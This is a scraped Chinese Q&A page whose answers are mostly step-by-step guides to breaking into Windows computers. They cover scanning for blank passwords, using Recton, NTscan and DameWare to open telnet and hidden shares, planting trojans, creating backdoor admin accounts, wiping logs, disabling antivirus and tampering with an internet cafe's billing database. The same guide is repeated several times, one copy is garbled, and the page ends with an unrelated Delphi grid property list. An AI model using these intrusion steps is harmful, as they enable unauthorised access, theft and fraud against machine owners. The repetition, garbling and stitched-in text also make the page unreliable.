ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。 七 ipc$连接失败的常见原因 以下是一些常见的导致ipc$连接失败的原因: 1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的; 2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接; 3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求; 4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接; 5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多); 6 响应方的139,445端口未处于监听状态或被防火墙屏蔽; 7 连接发起方未打开139,445端口; 8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于"无法更新密码"这样的错误提示(显然空会话排除这种错误); 9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可; 10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问:很可能你使用的用户不是管理员权限的; 错误号51,Windows无法找到网络路径:网络有问题; 错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连; 错误号1326,未知的用户名或错误密码:原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动; 错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。...............哈哈,你先删除原来的链接, net use \ipipc$ /del 删除IPC链接 ,然后在链接就好了!~
2023-06-28 05:27:521

在同一机房里怎么进入其它电脑里? 是XP系统! 谢谢!

网上邻居啊
2023-06-28 05:28:003

135端口入侵

一句话漫画也一会就要
2023-06-28 05:28:082

成了肉鸡该怎么办.?

拒绝做肉鸡
2023-06-28 05:28:1713

怎样在网吧前台里查到管理员密码?

 现在的网吧玩家懂得的计算机技术太多了,作为网吧热点,在网吧上网查看网吧主机信息,破解网吧管理密码,通过进入网吧管理密码,查询网吧主机的一些相关信息,包括系统信息、系统服务、用户和组以及共享文件夹等等。  1,先就需要知道网吧主机的IP地址才行。点击“开始”菜单中的“运行”命令,接着在弹出的窗口中输入“gpedit.mSC”并确定,打开“组策略”窗口。点击“用户配置”下“管理模板”中的“系统”,双击“停用命令提示符”选项,选中“已停用”这项,这样操作就可以轻松地突破网吧管理软件的命令提示符以及Windows命令行下工具的使用限制。  2,接着点击“开始”菜单中的“运行”命令,接着在弹出的窗口中输入“cmd.exe”并确定,打开命令提示符窗口,在窗口的命令行中输入“ipconfig/all”,在返回的信息中找到网吧主机的IP地址192.168.0.1以及本机的IP地址192.168.0.6。  3,然后运行准备好的“啊D网络工具包”,点击“工具”菜单下的“肉鸡查找”命令,在出现的操作界面中进行设置。  4,首先在操作界面的“IP”选项中设置为192.168.0.1,然后点击“开始查找”按钮,程序就会自动对网吧主机的账号密码进行破解  。成功连接到网吧主机以后,点击“Win2000远程管理”按钮来查看网吧主机的一些相关信息  5,点击“木马种植”按钮,在弹出的“木马种植机”窗口中进行设置,程序已经自动将主机、用户名、密码等选项设置好了,只需要点击“本地文件”后的按钮来选择需要生成的木马程序就可以了。  6,设置完成后,点击“开始”按钮,程序就会自动地将程序上传到网吧主机的系统中,然后自动运行它木马种机界面下面开始连接木马的服务端程序,连接成功后,找到网吧管理程序所在的目录,并下载其中的数据库文件到本地。  7,用工具将其打开,找到自己的账号后对账号余额进行修改就可以了。修改完成后,利用工具将网吧管理软件的进程结束,然后再将修改后的数据库文件复制到网吧管理软件的数据库目录下。  好了,这个步骤是很麻烦,但是玩家想要进入网吧管理密码,查看网吧主机信息,免费上网,只有这样做。
2023-06-28 05:28:422

肉鸡是什么木马病毒?

肉鸡也称傀儡机,是指可以被黑客远程控制的机器。比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马,黑客可以随意操纵它并利用它做任何事情。肉鸡通常被用作DDOS攻击。可以是各种系统,如windows、linux、unix等,更可以是一家公司、企业、学校甚至是政府军队的服务器。要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。说到肉鸡,就要讲到远程控制。远程控制软件例如灰鸽子、上兴等。肉鸡是中了木马,或者留了后门,可以被远程操控的机器,许多人把有WEBSHELL权限的机器也叫肉鸡。抓肉鸡法:1、一般XP都很难扫不出IP,先要突破一下,可以用工具是使xp支持syn扫描,运行就重启。线程就可以达到10240,然后将每次扫描,关闭防火墙命令是"net stop sharedaccess",一般都可以扫出IP,如果还不行,换个IP段。2、扫描环境:一般都是XP系统,但其实扫描IP速度很慢,而且扫不多。建议抓鸡[1]最好用服务器,服务器指2003系统,因为2003系统扫描速度快,而且扫到很多IP,是很好的抓鸡系统。3、抓鸡方法135端口,先扫描135IP,然后整理!然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的。因为这个漏洞很久,所以端口也很少的了。如果整理IP不好,就很难扫出弱口令。1433端口,先扫描1433IP,然后整理!然后用X-Scan-v3.3,扫描模块只选择SQL-Server弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了。3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP添加进入,见到XP,用户new密码为空进入,然后下载木马!见到2000,用户administrator密码为空进入然后下载木马!4899端口,先扫描4899IP,然后整理!然后用4899探测器,A导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行。5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉!80端口,先扫描80IP,然后整理,再用Apache Tomcat导入IP,端口8080改为80,等IP全部导完,点开始就可以,你看看有无一些网站结尾是HTML或者很长的,就可以进入这个网,然后上传个“hcskk.war”然后点hcskk.war进入,就可以自己下载木马,再用DOS运行。4、免杀木马抓鸡一定要个免杀木马,不然就抓不到的,先要学会免杀,那就容易抓到鸡拉!不会可以先学定位,用CCM修改就OK了
2023-06-28 05:28:525

漫威宇宙中的三面人是谁

然而新法庭又死了
2023-06-28 05:29:153

为什么下载Recton V2.5查杀病毒多显示有病毒

为什么下载Recton V2.5查杀病毒多显示有病毒问题是什么意思?是查杀都显示有病毒?如果是这样 1.的确有很多病毒.2.设置问题.比如设置.exe的文件都是病毒.3.软件误杀.
2023-06-28 05:30:041

怎么破解防火墙

用电转破
2023-06-28 05:30:134

发现对方135端口是开放的,之后怎么进行攻击,越多越好

通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)   协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;   使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。   下面我就来介绍一下通过135端口入侵的方法。   (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。   (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。   (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。   下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。 望采纳。。。。
2023-06-28 05:30:211

局域网怎么黑别人电脑

  局域网内控制别人的电脑相对来说没有广域网那么难,但是还是有些技巧的。下面是我为大家整理的关于局域网怎么黑别人电脑,一起来看看吧!   局域网怎么黑别人电脑 首先申明:   1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;   2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。   入侵工具:   一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)   入侵步骤:   1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。   2.使用"Recton--D贺免杀专用版"   选择"CMD命令"项,在"CMD:"中输入"net share C$=C:",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\对方IPC$",即可进入对方C盘。   选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \***.***.***.***IPC$ "" /user:administrator"在*处填入你入侵的主机IP。   3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。   入侵步骤补充:   1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。   2.Recton--D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入"\IPC$",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。   3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:winntsystem32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。   4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户   "net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add"。   5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:",查看C盘program file文件夹:"dir c:PROGRA~1;",60秒倒记时关机:"shutdown -s -t 60"
2023-06-28 05:30:281

知道IP和端口,怎样最简单的入侵到远程主机?

 通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)   协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;   使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。   下面我就来介绍一下通过135端口入侵的方法。   (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。   (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。   (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。   下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。
2023-06-28 05:30:541

如何攻击以开放的135端口

通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)   协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;   使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。   下面我就来介绍一下通过135端口入侵的方法。   (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。   (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。   (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。   下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。 望采纳。。。。请采纳。
2023-06-28 05:31:011

请教如何侵入局域网内的一台计算机

远控
2023-06-28 05:31:1115

一般情况下,采用端口扫描可以比较快速了解某台主机上提供了哪些网络服务

一般根据开放的端口 来了解对应的服务,比如 80 WEB服务 ,21 FTP服务。具体可以网上找找 端口大全。
2023-06-28 05:31:402

怎样才能破解网络防火墙

找黑客。
2023-06-28 05:31:503

知道IP和端口,怎样最简单的入侵到远程主机

 通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)  协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;  使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。  下面我就来介绍一下通过135端口入侵的方法。  (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。  (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。  (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。  下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。
2023-06-28 05:32:081

在局域网里怎么强制访问他人电脑?

步骤1:在桌面上的“网络”图标上双击鼠标左键,打开“网络”窗口,在窗口中的合适选项上单击鼠标左键,弹出列表框,选择“启用网络发现和文件共享”选项。步骤2:弹出“网络发现和文件共享”对话框,单击“是,启用所有公用网络的网络发现和文件共享”按钮。步骤3:即可搜索整个局域网中的电脑,搜索完毕后,显示出搜索结果,选择BS03图标。步骤4:在选择的图标上双击鼠标左键,即可打开BS03窗口,在窗口中显示了BS03这台电脑共享的所有资源,即可访问局域网中的电脑。详情:http://jingyan.baidu.com/article/0f5fb099d5be6a6d8334eaf1.html
2023-06-28 05:32:175

如何利用135端口入侵

利用135端口入侵的方法如下:1、通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。 2、得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。 3、获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。 下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。
2023-06-28 05:32:331

怎样用命令提示符关机不要弹出对话框?

首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。) 入侵步骤: 1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。 2.使用"Recton--D贺免杀专用版" 选择"CMD命令"项,在"CMD:"中输入"net share C$=C:",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\对方IPC$",即可进入对方C盘。 选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \***.***.***.***IPC$ "" /user:administrator"在*处填入你入侵的主机IP。 3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择XX对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴耎X愕纳矸荨? 入侵步骤补充: ()1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。 2.Recton--D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入"\IPC$",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。 3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:winntsystem32",共享IPC$用:"net share IPC$"等,最后蔢X乇展蚕恚 乇诔盘共享:"net share C$ /del"。 4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户 "net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add"。 5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:",查看C盘program file文件夹:"dir c:PROGRA~1 怎样用命令提示符关机不要弹出对话框? http://www.kb20.com/ 满意请采纳
2023-06-28 05:32:402

445端口如何入侵?可以入侵的端口有哪几个?

通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)   协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;   使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。   下面我就来介绍一下通过135端口入侵的方法。   (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。   (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。   (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。   下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。
2023-06-28 05:32:481

如何改变SecureCRT显示的最大列数

方法: Add: 增加一个Level; Levels[i].Add:增加一个子Level; TcxGridDBBandedTableView组件:属性:BackGroundBitmaps:背景图片选项 Background:背景图 Bandbackground:带背景图 Bankheader:带头背景 Content:细节区背景 filterBox:过滤区背景 footer:注脚背景 group: 组背景 header:列头背景 preview:预览区背景Bands:带列表DataController: 数据控制 DataSource:数据源 DetailKeyFieldNames:主从表时设置细表键字段名 KeyFieldNames: 主从表时设置关键字段名 MasterKeyFieldNames:主从表时设置主表键字段名 Summary:合计组 FooterSummaryItems:注脚定义 FooterSummaryItems:组脚定义FilterBox:过滤框 CustomizeDialog:是否自定义过滤条件 Position:过滤框显示位置 Visible:显示过滤框NavigatorButtons:导航条设置 Append:增加按钮设置Enabled:是否禁用该按钮Visible:是否显示该按钮ImageIndex:图标ID Cancel:取消按钮设置,具体设置同Append; ConfirmDelete:删除时是否确认提示 Delete: 具体设置同Append; Edit: 具体设置同Append; First: 具体设置同Append; Insert: 具体设置同Append; Last: 具体设置同Append; Next: 具体设置同Append; Filter: 具体设置同Append; GotoBookmark: 具体设置同Append; NextPage: 具体设置同Append; Post: 具体设置同Append; Prior: 具体设置同Append; PriorPage: 具体设置同Append; Refresh: 具体设置同Append; SaveBookmark: 具体设置同Append; OptionsBehavior:行为选项 AlwaysShowEditor:是否总是显示编辑条 BandHeaderHints:带头是否显示提示 CellHints:单元格是否显示提示 ColumnHeaderHints:列头是否显示提示 CopyCaptionsToClipboard:是否允许复制标题到剪贴板 CopyPreviewToClipboard:是否允许复制预览内容到剪贴板 ExpandMasterRowOnDblClik:是否允许双击行显示明细 FocusFirstCellOnNewRecord:新增记录时是否焦点指向第一列单元格 GoToNextCellOnEnter:按回车是否自动跳到下一单元格 NavigatorHints:是否显示导航条提示 OptionsCustomize:自定义选项 